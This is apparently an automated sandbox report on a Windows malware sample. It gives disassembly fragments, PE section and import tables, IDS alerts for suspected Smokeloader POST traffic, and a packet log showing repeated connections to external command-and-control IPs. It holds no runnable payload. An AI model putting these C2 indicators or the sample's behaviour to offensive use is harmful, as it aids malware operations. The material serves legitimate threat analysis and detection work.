                                    mov word ptr [0041B3B4h], es
                                    mov word ptr [0041B3B0h], fs
                                    mov word ptr [0041B3ACh], gs
                                    pushfd
                                    pop dword ptr [0041B3E0h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [0041B3D4h], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [0041B3D8h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [0041B3E4h], eax
                                    mov eax, dword ptr [ebp-00000320h]
                                    mov dword ptr [0041B320h], 00010001h
                                    mov eax, dword ptr [0041B3D8h]
                                    mov dword ptr [0041B2D4h], eax
                                    mov dword ptr [0041B2C8h], C0000409h
                                    mov dword ptr [0041B2CCh], 00000001h
                                    mov eax, dword ptr [0041A008h]
                                    mov dword ptr [ebp-00000328h], eax
                                    mov eax, dword ptr [0041A00Ch]
                                    mov dword ptr [ebp-00000324h], eax
                                    call dword ptr [000000E8h]
                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [ C ] VS2008 build 21022
                                    • [IMP] VS2005 build 50727
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x187240x50.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x27220000x29810.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x170000x188.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x1536f0x15400d9f6f2e355da13b0605c446f69f8ab36False0.8254940257352941data7.557544545964827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x170000x20260x2200015eea173e4482b2da1d23e4e48ecb46False0.36144301470588236data5.426629733611342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x1a0000x26fff7c0x1400c0c063eabbb97a813e07a4dc77f29fa1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .kibojis0x271a0000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .xeto0x271f0000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x27220000x298100x29a00ac1373b8d4a9736ee5e17d763fc3f5d3False0.3729588963963964data4.765772210605211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    AFX_DIALOG_LAYOUT0x27400a80x2data5.0
                                    RT_CURSOR0x27400b00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                    RT_CURSOR0x27401f80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                    RT_CURSOR0x27403280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                    RT_CURSOR0x27428f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                    RT_CURSOR0x27437b80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                    RT_CURSOR0x27438e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                    RT_ICON0x2722e000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5674307036247335
                                    RT_ICON0x2723ca80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6376353790613718
                                    RT_ICON0x27245500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6849078341013825
                                    RT_ICON0x2724c180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                                    RT_ICON0x27251800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.512863070539419
                                    RT_ICON0x27277280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6137429643527205
                                    RT_ICON0x27287d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6163934426229508
                                    RT_ICON0x27291580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7553191489361702
                                    RT_ICON0x27296380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3363539445628998
                                    RT_ICON0x272a4e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.523014440433213
                                    RT_ICON0x272ad880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5829493087557603
                                    RT_ICON0x272b4500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6315028901734104
                                    RT_ICON0x272b9b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42728215767634853
                                    RT_ICON0x272df600x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5045081967213115
                                    RT_ICON0x272e8e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5026595744680851
                                    RT_ICON0x272edb80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3350213219616205
                                    RT_ICON0x272fc600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.388086642599278
                                    RT_ICON0x27305080x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.39285714285714285
                                    RT_ICON0x2730bd00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.40534682080924855
                                    RT_ICON0x27311380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.21950207468879668
                                    RT_ICON0x27336e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.2474202626641651
                                    RT_ICON0x27347880x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.2815573770491803
                                    RT_ICON0x27351100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.31117021276595747
                                    RT_ICON0x27355f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39285714285714285
                                    RT_ICON0x27364980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5537003610108303
                                    RT_ICON0x2736d400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6226958525345622
                                    RT_ICON0x27374080x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                    RT_ICON0x27379700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.425422138836773
                                    RT_ICON0x2738a180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4209016393442623
                                    RT_ICON0x27393a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.46187943262411346
                                    RT_ICON0x27398700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.279317697228145
                                    RT_ICON0x273a7180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.3664259927797834
                                    RT_ICON0x273afc00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.3773041474654378
                                    RT_ICON0x273b6880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3764450867052023
                                    RT_ICON0x273bbf00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.2587136929460581
                                    RT_ICON0x273e1980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.27345215759849906
                                    RT_ICON0x273f2400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28852459016393445
                                    RT_ICON0x273fbc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32180851063829785
                                    RT_STRING0x27460700xaadata0.5588235294117647
                                    RT_STRING0x27461200x600data0.4361979166666667
                                    RT_STRING0x27467200x460data0.45
                                    RT_STRING0x2746b800x64adata0.4360248447204969
                                    RT_STRING0x27471d00x7b8data0.4185222672064777
                                    RT_STRING0x27479880x6d0data0.4294724770642202
                                    RT_STRING0x27480580x76cdata0.42526315789473684
                                    RT_STRING0x27487c80x606data0.4455252918287938
                                    RT_STRING0x2748dd00x7c2data0.42245720040281975
                                    RT_STRING0x27495980x810data0.42102713178294576
                                    RT_STRING0x2749da80x584data0.4461756373937677
                                    RT_STRING0x274a3300x74cdata0.4234475374732334
                                    RT_STRING0x274aa800x710data0.4303097345132743
                                    RT_STRING0x274b1900x5f6data0.4325032765399738
                                    RT_STRING0x274b7880x88data0.625
                                    RT_GROUP_CURSOR0x27401e00x14data1.15
                                    RT_GROUP_CURSOR0x27428d00x22data1.088235294117647
                                    RT_GROUP_CURSOR0x27437a00x14data1.25
                                    RT_GROUP_CURSOR0x2745e900x22data1.088235294117647
                                    RT_GROUP_ICON0x272ed500x68dataTurkishTurkey0.7019230769230769
                                    RT_GROUP_ICON0x27355780x76dataTurkishTurkey0.6694915254237288
                                    RT_GROUP_ICON0x27400300x76dataTurkishTurkey0.6694915254237288
                                    RT_GROUP_ICON0x27295c00x76dataTurkishTurkey0.6610169491525424
                                    RT_GROUP_ICON0x27398080x68dataTurkishTurkey0.7211538461538461
                                    RT_VERSION0x2745eb80x1b4data0.5871559633027523
                                    DLLImport
                                    KERNEL32.dllOpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, DeleteVolumeMountPointA, GetFileAttributesW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SearchPathW, GetConsoleAliasExesLengthA, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                    GDI32.dllGetBoundsRect
                                    ADVAPI32.dllClearEventLogW
                                    Language of compilation systemCountry where language is spokenMap
                                    TurkishTurkey
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-13T17:02:34.009237+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973678.89.199.21680TCP
                                    2024-10-13T17:02:35.260507+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973778.89.199.21680TCP
                                    2024-10-13T17:02:36.675576+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973878.89.199.21680TCP
                                    2024-10-13T17:02:37.879607+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973978.89.199.21680TCP
                                    2024-10-13T17:02:39.110270+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974078.89.199.21680TCP
                                    2024-10-13T17:02:40.315350+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974178.89.199.21680TCP
                                    2024-10-13T17:02:41.719962+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974278.89.199.21680TCP
                                    2024-10-13T17:02:43.127590+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974378.89.199.21680TCP
                                    2024-10-13T17:02:44.418920+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974478.89.199.21680TCP
                                    2024-10-13T17:02:45.652054+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974578.89.199.21680TCP
                                    2024-10-13T17:02:46.866023+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974678.89.199.21680TCP
                                    2024-10-13T17:02:48.088816+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974778.89.199.21680TCP
                                    2024-10-13T17:02:49.324243+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974878.89.199.21680TCP
                                    2024-10-13T17:02:50.631889+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974978.89.199.21680TCP
                                    2024-10-13T17:02:51.847825+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975078.89.199.21680TCP
                                    2024-10-13T17:02:53.053024+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975178.89.199.21680TCP
                                    2024-10-13T17:02:54.269862+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975278.89.199.21680TCP
                                    2024-10-13T17:02:55.483123+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975378.89.199.21680TCP
                                    2024-10-13T17:02:56.676550+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975478.89.199.21680TCP
                                    2024-10-13T17:02:58.136557+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975678.89.199.21680TCP
                                    2024-10-13T17:02:59.375455+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976878.89.199.21680TCP
                                    2024-10-13T17:03:00.567671+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977478.89.199.21680TCP
                                    2024-10-13T17:03:01.795567+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44978578.89.199.21680TCP
                                    2024-10-13T17:03:03.055928+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44979478.89.199.21680TCP
                                    2024-10-13T17:03:04.302004+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44980278.89.199.21680TCP
                                    2024-10-13T17:03:05.654853+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44981078.89.199.21680TCP
                                    2024-10-13T17:03:06.907800+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44981978.89.199.21680TCP
                                    2024-10-13T17:03:08.190298+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44982878.89.199.21680TCP
                                    2024-10-13T17:03:09.445903+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44983678.89.199.21680TCP
                                    2024-10-13T17:03:10.849624+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44984578.89.199.21680TCP
                                    2024-10-13T17:03:12.157474+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44985678.89.199.21680TCP
                                    2024-10-13T17:03:13.543698+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44986478.89.199.21680TCP
                                    2024-10-13T17:03:14.797727+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44987378.89.199.21680TCP
                                    2024-10-13T17:03:15.976762+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44988278.89.199.21680TCP
                                    2024-10-13T17:03:17.244744+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44989078.89.199.21680TCP
                                    2024-10-13T17:03:18.612428+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44989678.89.199.21680TCP
                                    2024-10-13T17:04:28.029229+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003878.89.199.21680TCP
                                    2024-10-13T17:04:34.140280+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45003978.89.199.21680TCP
                                    2024-10-13T17:04:39.391353+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004078.89.199.21680TCP
                                    2024-10-13T17:04:44.509898+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004178.89.199.21680TCP
                                    2024-10-13T17:04:50.069868+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004278.89.199.21680TCP
                                    2024-10-13T17:04:55.760104+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004378.89.199.21680TCP
                                    2024-10-13T17:05:01.475818+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.45004478.89.199.21680TCP
                                    2024-10-13T17:05:06.987167+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450045109.175.29.3980TCP
                                    2024-10-13T17:05:11.639706+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450046109.175.29.3980TCP
                                    2024-10-13T17:05:16.825285+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450047109.175.29.3980TCP
                                    2024-10-13T17:05:23.062242+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450048109.175.29.3980TCP
                                    2024-10-13T17:05:28.723373+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450049109.175.29.3980TCP
                                    2024-10-13T17:05:34.540144+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450050109.175.29.3980TCP
                                    2024-10-13T17:05:40.583026+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450051109.175.29.3980TCP
                                    2024-10-13T17:05:45.894239+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450052109.175.29.3980TCP
                                    2024-10-13T17:05:50.727891+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450053109.175.29.3980TCP
                                    2024-10-13T17:05:56.082119+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450054109.175.29.3980TCP
                                    2024-10-13T17:06:01.188741+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450055109.175.29.3980TCP
                                    2024-10-13T17:06:06.774445+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450056109.175.29.3980TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 13, 2024 17:02:32.560286999 CEST4973680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:32.566359997 CEST804973678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:32.566431046 CEST4973680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:32.576184988 CEST4973680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:32.576219082 CEST4973680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:32.581362963 CEST804973678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:32.581377029 CEST804973678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:34.009001017 CEST804973678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:34.009186029 CEST804973678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:34.009237051 CEST4973680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:34.013793945 CEST4973680192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:34.015855074 CEST4973780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:34.018697023 CEST804973678.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:34.020775080 CEST804973778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:34.020849943 CEST4973780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:34.020936966 CEST4973780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:34.020936966 CEST4973780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:34.025847912 CEST804973778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:34.026043892 CEST804973778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:35.259593964 CEST804973778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:35.259953976 CEST804973778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:35.260507107 CEST4973780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:35.260507107 CEST4973780192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:35.263489008 CEST4973880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:35.266388893 CEST804973778.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:35.268676043 CEST804973878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:35.268934011 CEST4973880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:35.269042015 CEST4973880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:35.269079924 CEST4973880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:35.273986101 CEST804973878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:35.274315119 CEST804973878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:36.674861908 CEST804973878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:36.675302982 CEST804973878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:36.675575972 CEST4973880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:36.675885916 CEST4973880192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:36.680715084 CEST804973878.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:36.683495045 CEST4973980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:36.688721895 CEST804973978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:36.688817024 CEST4973980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:36.688941956 CEST4973980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:36.688975096 CEST4973980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:36.694111109 CEST804973978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:36.694417953 CEST804973978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:37.879072905 CEST804973978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:37.879406929 CEST804973978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:37.879606962 CEST4973980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:37.879607916 CEST4973980192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:37.882751942 CEST4974080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:37.884685993 CEST804973978.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:37.887845993 CEST804974078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:37.887921095 CEST4974080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:37.888127089 CEST4974080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:37.888159037 CEST4974080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:37.893713951 CEST804974078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:37.893760920 CEST804974078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:39.110152006 CEST804974078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:39.110207081 CEST804974078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:39.110270023 CEST4974080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:39.110418081 CEST4974080192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:39.112994909 CEST4974180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:39.115324974 CEST804974078.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:39.118015051 CEST804974178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:39.118139982 CEST4974180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:39.118288040 CEST4974180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:39.118324041 CEST4974180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:39.123888016 CEST804974178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:39.124034882 CEST804974178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:40.314954042 CEST804974178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:40.315179110 CEST804974178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:40.315350056 CEST4974180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:40.315351009 CEST4974180192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:40.318582058 CEST4974280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:40.320806980 CEST804974178.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:40.323703051 CEST804974278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:40.323776960 CEST4974280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:40.323925018 CEST4974280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:40.323961020 CEST4974280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:40.329161882 CEST804974278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:40.329277992 CEST804974278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:41.718607903 CEST804974278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:41.719450951 CEST804974278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:41.719961882 CEST4974280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:41.719961882 CEST4974280192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:41.723174095 CEST4974380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:41.725390911 CEST804974278.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:41.728741884 CEST804974378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:41.729180098 CEST4974380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:41.729180098 CEST4974380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:41.729296923 CEST4974380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:41.734564066 CEST804974378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:41.734639883 CEST804974378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:43.127505064 CEST804974378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:43.127526999 CEST804974378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:43.127589941 CEST4974380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:43.127773046 CEST4974380192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:43.132734060 CEST804974378.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:43.186113119 CEST4974480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:43.191576958 CEST804974478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:43.191756964 CEST4974480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:43.191849947 CEST4974480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:43.191849947 CEST4974480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:43.197463036 CEST804974478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:43.197654009 CEST804974478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:44.418507099 CEST804974478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:44.418549061 CEST804974478.89.199.216192.168.2.4
                                    Oct 13, 2024 17:02:44.418920040 CEST4974480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:44.419318914 CEST4974480192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:44.422872066 CEST4974580192.168.2.478.89.199.216
                                    Oct 13, 2024 17:02:44.425367117 CEST804974478.89.199.216192.168.2.4
